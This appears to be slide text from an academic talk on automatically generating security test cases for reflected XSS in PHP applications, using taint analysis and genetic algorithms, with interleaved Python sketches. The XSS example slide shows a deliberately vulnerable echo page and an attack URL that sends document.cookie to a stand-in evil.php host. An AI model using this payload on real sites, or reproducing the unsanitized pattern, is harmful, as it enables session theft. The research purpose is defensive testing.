[1] Andrea Avancini and Mariano Ceccato. Towards security testing with taint
analysis and genetic algorithms. In SESS 2010: Proceedings of the 2010 ICSE
Workshop on Software Engineering for Secure Systems, pages 65-71, New York,
NY, USA, 2010. ACM.
FBK - Fondazione Bruno Kessler
• FBK (more than 350 researchers)
is a research organization of the
Autonomous Province of Trento
that promotes research in the
areas of:
– science,
– technology and
– humanities
Software Engineering unit
• Goal oriented requirements modeling
– Norm compliant requirements
– Requirements engineering for Adaptive Software systems
– Requirements formalization/prioritization
• Agent oriented software engineering
– Tropos
• Reverse engineering and re-engineering
– Automatic migration of legacy systems
– Reverse engineering of Object Oriented systems
• Testing
– Automatic test case generation
– Testing of Web 2.0 (Ajax) applications
– Testing of future internet applications
– Security testing of web applications
Unit at a glance
People:
Tenured   Postdoc   PhD   Progs   Total
5         3         6     1       15
Projects active in 2010:
Name                                 Type         Duration
IBT (Info. Bancaria Trentina)        Industrial   2007-2011
A-cube (Ambient Aware Assistance)    PAT          2008-2011
CERN (Code quality at Alice)         Industrial   2010-2012
FITTEST (Future Internet Testing)    EU-FP7       2010-2013
IoS (Internet of Services)           JRP          2009-2013
L’architettura delle performance     Ministero    2010-2013
About me
• In particular I work on:
– Security testing of web applications
– Empirical studies in software engineering
– Code transformation and re-engineering
Towards security testing with
taint analysis and genetic algorithms
Security vulnerabilities
• Web applications are publicly exposed to a hostile environment
• Successful attacks may cause
– Sensitive information disclosure
– Revenue loss
• XSS (cross-site scripting) is one of the most prominent security vulnerabilities
Current situation
• Methodologies to formalize access control and data
confidentiality (e.g. encryption)
• Approaches for intrusion detection or vulnerability
identification on the network layer
• Lack of a mature/consolidated approach on the
application layer
– Often responsibility is delegated to “experts”
– Tools used only as starting point for manual investigation
– Adoption of firewalls or monitors to block suspicious activity
(similar to an anti-virus)
• Annoying for users
• Blocking only known threats
Static analysis
• Valuable help for manual review: it provides
starting points (candidate vulnerabilities)
• Limitations:
– Missing evaluation of dynamic constructs
(reflective calls, pointers, …)
– Conservative approach (false positives)
– Does not provide examples, just points where
to start looking
The vision
• Taking advantage of testing-specific
methodologies for security testing
– Automatic generation of test cases
– Definition of “security adequate” test suite
– Definition of security oracle
Contributions
• Focus on reflected XSS vulnerabilities
• We resort to search-based software
engineering, using genetic algorithms
• Generation of (security) test cases for
candidate vulnerabilities identified by static
analysis
– Test cases demonstrate how security can be
broken, a valuable support for maintainers
• Validation on a case study
XSS example
<?php
$a = $_GET["name"];
echo "Your name is: ";
echo $a;
?>
Request: www.mysite.com?name=Mariano
Output: Your name is: Mariano
Attack request: www.mysite.com?name=<a href="" onclick="this.href='evil.php?data='%2Bdocument.cookie">click here</a>
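The flow in this example can be mimicked outside PHP. The following is a minimal Python sketch, not the page from the talk: `render_page`, the `sanitize` flag and the `ATTACK` constant are hypothetical names introduced here, and `html.escape` merely stands in for whatever validation routine an application might apply.

```python
import html
from urllib.parse import parse_qs


def render_page(query_string: str, sanitize: bool = False) -> str:
    """Mimic the PHP page: read `name` from the query string and echo it."""
    params = parse_qs(query_string, keep_blank_values=True)
    name = params.get("name", [""])[0]  # tainted: fully attacker-controlled
    if sanitize:
        # Hypothetical validation step, not part of the original page.
        name = html.escape(name)
    return "Your name is: " + name  # sink: the value reaches the HTML output


# The attack request from the slide, as a query string (%2B decodes to '+').
ATTACK = ('name=<a href="" onclick="this.href=\'evil.php?data=\''
          '%2Bdocument.cookie">click here</a>')

if __name__ == "__main__":
    print(render_page("name=Mariano"))
    print(render_page(ATTACK))                 # markup is reflected verbatim
    print(render_page(ATTACK, sanitize=True))  # markup is escaped
```

Without the validation step the injected link reaches the output unchanged, which is the tainted-source-to-sink path that the rest of the talk tries to exercise with generated test cases.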
XSS on the CFG
Taint analysis
False positive
Test case generation
• Taint analysis is a good starting point
– It provides candidate vulnerabilities
– It does not provide executable examples
– It may report false positives
Genetic algorithms
• Individuals represent candidate solutions to the problem (test cases)
• Input values are represented as chromosomes
• A fitness function filters out less suitable individuals and
preserves more suitable ones
• The more suitable individuals are recombined to
generate a new population that is at least as fit as
the previous one
[Figure: genetic algorithm cycle: initial population → fitness calculation → crossover → mutation → new population]
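The cycle above can be sketched as a short loop. This is a generic illustration under stated assumptions, not the tool's implementation: `evolve`, `one_point_crossover` and `flip_one_bit` are hypothetical names, selection keeps the fitter half of the population, and bit lists stand in for real test inputs. Copying the best individual into the next generation (elitism) is one simple way to keep the new population at least as fit as the previous one.

```python
import random


def evolve(population, fitness, crossover, mutate, generations=50, rng=None):
    """Run a basic genetic algorithm and return the fittest individual found."""
    rng = rng or random.Random(0)
    for _ in range(generations):
        # Fitness calculation: rank individuals, fittest first.
        ranked = sorted(population, key=fitness, reverse=True)
        parents = ranked[: max(2, len(ranked) // 2)]
        # Elitism: the best individual survives unchanged, so the best
        # fitness in the population never decreases.
        children = [ranked[0]]
        while len(children) < len(population):
            a, b = rng.sample(parents, 2)
            children.append(mutate(crossover(a, b, rng), rng))
        population = children  # new population
    return max(population, key=fitness)


def one_point_crossover(a, b, rng):
    """Toy crossover on lists: head of one parent, tail of the other."""
    cut = rng.randrange(1, len(a))
    return a[:cut] + b[cut:]


def flip_one_bit(individual, rng):
    """Toy mutation on bit lists: flip one randomly chosen position."""
    i = rng.randrange(len(individual))
    return individual[:i] + [1 - individual[i]] + individual[i + 1:]


if __name__ == "__main__":
    rng = random.Random(1)
    start = [[rng.randint(0, 1) for _ in range(8)] for _ in range(6)]
    best = evolve(start, sum, one_point_crossover, flip_one_bit, 20, rng)
    print(best, sum(best))
```

In the setting of the talk, the individuals would be sets of request parameters and the fitness would come from executing the page, rather than from counting bits.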
Fitness function
• Individuals closer to the
solution are rewarded with a
higher fitness value
(they are more fit)
• The fitness function is the approach
level:
– Number of branches to
traverse in order to
execute/skip particular
statements
http://mysite.com?a=Mariano&b=Ceccato
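One plausible reading of this fitness, consistent with "higher is fitter", is to count how many of the branches on the path to the target statement an execution took in the required direction. The sketch below assumes that reading; `approach_fitness`, `run_page`, `TARGET_PATH` and the branch names are all hypothetical, and the toy page logic is invented for illustration only.

```python
from typing import Dict, List, Tuple

Branch = Tuple[str, bool]  # (branch id, outcome required to stay on the path)


def approach_fitness(target_path: List[Branch], trace: Dict[str, bool]) -> int:
    """Count the leading branches of the target path that were taken as required."""
    satisfied = 0
    for branch_id, required in target_path:
        if trace.get(branch_id) != required:
            break  # execution left the target path here
        satisfied += 1
    return satisfied


def run_page(params: Dict[str, str]) -> Dict[str, bool]:
    """Toy stand-in for an instrumented page: record each branch outcome."""
    trace = {"has_a": "a" in params}
    if not trace["has_a"]:
        return trace
    trace["has_b"] = "b" in params
    if not trace["has_b"]:
        return trace
    # Hypothetical branch that skips validation when b equals "debug".
    trace["b_is_debug"] = params["b"] == "debug"
    return trace


# Branches that must be taken to reach the sink with an unvalidated value.
TARGET_PATH = [("has_a", True), ("has_b", True), ("b_is_debug", True)]

if __name__ == "__main__":
    request = {"a": "Mariano", "b": "Ceccato"}
    print(approach_fitness(TARGET_PATH, run_page(request)))
```

With the parameters from the URL above, two of the three required branches are taken; an input that also satisfies the last branch would reach the full fitness of three.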
Crossover
Mutation
Mutation operators:
• Add pair
• Remove pair
• Change parameter value
Example individual: {(firstname, john), (surname, smithx3scr), (age, 23)}
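The three operators can be sketched on an individual stored as a dictionary of parameter/value pairs. This is an illustrative sketch only: the function names, the `known_names` list and the random-string alphabet are assumptions, not details taken from the prototype.

```python
import random
import string

ALPHABET = string.ascii_letters + string.digits + "<>\"'/="


def random_value(rng, max_len=8):
    """Random string of 1..max_len characters (assumed value generator)."""
    return "".join(rng.choice(ALPHABET) for _ in range(rng.randint(1, max_len)))


def add_pair(individual, rng, known_names):
    """Add one parameter the individual does not use yet, with a random value."""
    unused = [n for n in known_names if n not in individual]
    mutated = dict(individual)
    if unused:
        mutated[rng.choice(unused)] = random_value(rng)
    return mutated


def remove_pair(individual, rng):
    """Drop one randomly chosen parameter."""
    mutated = dict(individual)
    if mutated:
        del mutated[rng.choice(sorted(mutated))]
    return mutated


def change_value(individual, rng):
    """Replace the value of one randomly chosen parameter."""
    mutated = dict(individual)
    if mutated:
        mutated[rng.choice(sorted(mutated))] = random_value(rng)
    return mutated


def mutate(individual, rng, known_names):
    """Apply one of the three operators, chosen uniformly at random."""
    choice = rng.randrange(3)
    if choice == 0:
        return add_pair(individual, rng, known_names)
    if choice == 1:
        return remove_pair(individual, rng)
    return change_value(individual, rng)


if __name__ == "__main__":
    rng = random.Random(0)
    individual = {"firstname": "john", "surname": "smithx3scr", "age": "23"}
    print(mutate(individual, rng, ["firstname", "surname", "age", "email"]))
```

Each operator returns a new dictionary and leaves the parent untouched, so the same parent can be reused for several offspring.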
Tool prototype
Sanity check with
random testing
• 50,000 test cases are generated for each vulnerability
• Random generation procedure:
– take a subset of the page parameters
– for each of them, randomly generate a value in one of two ways:
• Completely random
• Chosen from the constant strings in the application code
• We compute the approach level for each random test
• The maximum approach level for each vulnerability is compared with
the one obtained with the genetic algorithm
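The random baseline described above might look as follows. This is a sketch under assumptions: `random_test` and `best_random_fitness` are hypothetical names, the two value sources are chosen with equal probability (the slides do not state the ratio), and `fitness` is any function that maps a test to its approach level.

```python
import random
import string


def random_test(page_params, code_constants, rng, max_len=8):
    """Build one random test: a subset of parameters with random values."""
    chosen = rng.sample(page_params, rng.randint(0, len(page_params)))
    test = {}
    for name in chosen:
        if code_constants and rng.random() < 0.5:  # assumed 50/50 split
            # Value taken from the constant strings in the application code.
            test[name] = rng.choice(code_constants)
        else:
            # Completely random value.
            length = rng.randint(1, max_len)
            test[name] = "".join(rng.choice(string.printable) for _ in range(length))
    return test


def best_random_fitness(fitness, page_params, code_constants, n_tests=50_000, rng=None):
    """Return the maximum fitness reached by n_tests random tests."""
    rng = rng or random.Random(0)
    return max(
        fitness(random_test(page_params, code_constants, rng))
        for _ in range(n_tests)
    )


if __name__ == "__main__":
    params = ["a", "b", "c"]
    constants = ["debug", "admin"]
    # Toy fitness for demonstration only: the number of parameters supplied.
    print(best_random_fitness(len, params, constants, n_tests=1000))
```

The value returned for each candidate vulnerability is what gets compared with the best approach level reached by the genetic algorithm.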
Experimental results
Considerations
• We pass the sanity check of random testing
• If the algorithm converges, a solution is found in
less than 50 generations:
– Test cases are generated only for feasible paths
– When no solution is found either the path is infeasible
or the approach fails: manual analysis required
• Test cases trigger execution paths in which a
tainted variable is used in a sink
• A test case shows the way input data can skip
validation routines
• A test case does not exploit a vulnerability, it just
executes the vulnerable code.
Future work
• More advanced fitness functions (branch distance)
• More specific mutation operators and string
generation
– Based on syntax definition
– When strings represent dates, numbers, enums…
• Integration of/comparison with concolic execution
• Generation of real attacks
• Further investigation on
– Persistent, DOM-based XSS
– SQL-injection
– CSRF
Conclusions
• Static analysis can be used to help manual
review (candidate vulnerable points)
• We combined it with genetic algorithms to
generate actual test cases (input values)
• Automatic test case generation for
candidate vulnerabilities
– To show how vulnerabilities affect the code
• Prototype implemented and applied to a real
PHP application
Questions?